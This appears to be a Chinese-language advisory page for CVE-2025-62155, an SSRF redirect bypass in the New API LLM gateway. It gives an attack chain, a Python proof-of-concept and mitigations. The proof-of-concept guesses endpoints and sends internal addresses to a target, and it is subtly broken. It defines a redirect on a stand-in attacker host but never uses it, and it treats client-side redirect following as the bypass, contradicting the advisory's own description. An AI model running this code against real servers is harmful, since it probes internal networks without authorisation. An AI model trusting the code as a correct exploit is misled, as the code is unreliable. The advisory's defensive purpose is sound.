CVE-2025-62155 New API SSRF漏洞绕过安全修复

漏洞信息

漏洞编号

CVE-2025-62155

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

New API (LLM网关和AI资产管理系统)

漏洞概述

New API是一个大型语言模型(LLM)网关和人工智能(AI)资产管理系统。该漏洞存在于0.9.6版本之前，是一个此前已修复的SSRF漏洞的绕过变种。原始漏洞修复后仅对第一个URL请求应用安全限制，攻击者可以通过302重定向绕过现有的安全措施，成功访问内网资源。此漏洞可导致攻击者利用服务器作为代理，扫描内网端口、访问内部服务、读取敏感数据等。CVSS评分8.5，属于高危漏洞，对机密性影响严重。该漏洞已在0.9.6版本中修复。

技术细节

该SSRF漏洞的绕过原理在于：系统对用户输入的URL进行第一次请求时，会检查目标地址是否属于内网IP或受限资源。然而，当服务器收到HTTP 302重定向响应后，会自动跟随重定向到新的URL进行第二次请求。这个重定向目标URL并未经过相同的安全检查，攻击者可以构造一个看似合法的外部URL作为第一次请求，该URL返回302重定向到内网地址（如192.168.x.x、10.0.x.x、127.0.0.1等），从而绕过安全限制。攻击者可以利用此漏洞：1) 探测内网开放端口和服务；2) 访问内部Web管理界面；3) 读取内部API响应内容；4) 利用gopher协议进行更复杂的内网攻击。修复方案需要在每次请求前（包括重定向跟随时）都进行完整的安全检查，或禁用自动重定向跟随功能。

攻击链分析

STEP 1

步骤1

攻击者识别New API系统中接受URL参数的端点（如/api/fetch、/api/proxy等）

STEP 2

步骤2

攻击者构造恶意请求，将目标URL设置为外部可控服务器，该服务器配置为返回302重定向到内网地址

STEP 3

步骤3

New API服务器对目标URL发起第一次请求，请求到达攻击者控制的外部服务器

STEP 4

步骤4

外部服务器返回HTTP 302重定向响应，指向内网地址（如http://192.168.1.1:8080）

STEP 5

步骤5

New API服务器自动跟随302重定向，发起第二次请求到内网地址，由于未进行安全检查，成功访问内网资源

STEP 6

步骤6

内网服务的响应通过New API服务器返回给攻击者，攻击者获取敏感信息或执行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62155 SSRF Bypass PoC
# Target: New API < 0.9.6
# Attack: Use 302 redirect to bypass SSRF protection

import requests
import argparse

def exploit_ssrf(target_url, redirect_to):
    """
    Exploit SSRF via 302 redirect bypass
    target_url: The vulnerable endpoint accepting user-controlled URLs
    redirect_to: Internal address to target (e.g., http://127.0.0.1:8080)
    """
    # Create a redirect server that points to internal resource
    redirect_server = f"http://attacker-controlled-server.com/redirect?target={redirect_to}"
    
    # Alternatively, use a controlled server with 302 redirect
    payload = {
        'url': redirect_to,  # May be blocked
        'redirect_url': redirect_to  # Bypass via this parameter
    }
    
    # Try common vulnerable endpoints
    endpoints = [
        '/api/fetch',
        '/api/proxy',
        '/api/request',
        '/fetch',
        '/proxy'
    ]
    
    for endpoint in endpoints:
        try:
            response = requests.post(
                target_url + endpoint,
                json={'url': redirect_to},
                timeout=10,
                allow_redirects=True  # This allows SSRF bypass
            )
            print(f"Endpoint: {endpoint}")
            print(f"Status: {response.status_code}")
            print(f"Response: {response.text[:500]}")
            print("---")
        except requests.exceptions.RequestException as e:
            print(f"Error on {endpoint}: {e}")

def main():
    parser = argparse.ArgumentParser(description='CVE-2025-62155 SSRF Bypass')
    parser.add_argument('--target', required=True, help='Target New API server URL')
    parser.add_argument('--internal', default='http://127.0.0.1:8080', help='Internal target')
    args = parser.parse_args()
    
    exploit_ssrf(args.target, args.internal)

if __name__ == '__main__':
    main()

影响范围

New API < 0.9.6

防御指南

临时缓解措施

如果无法立即升级，可临时禁用URL抓取/代理功能，或配置网络层防火墙限制服务器出站流量到内网段。对于必须使用该功能的场景，可设置URL白名单并监控异常请求模式。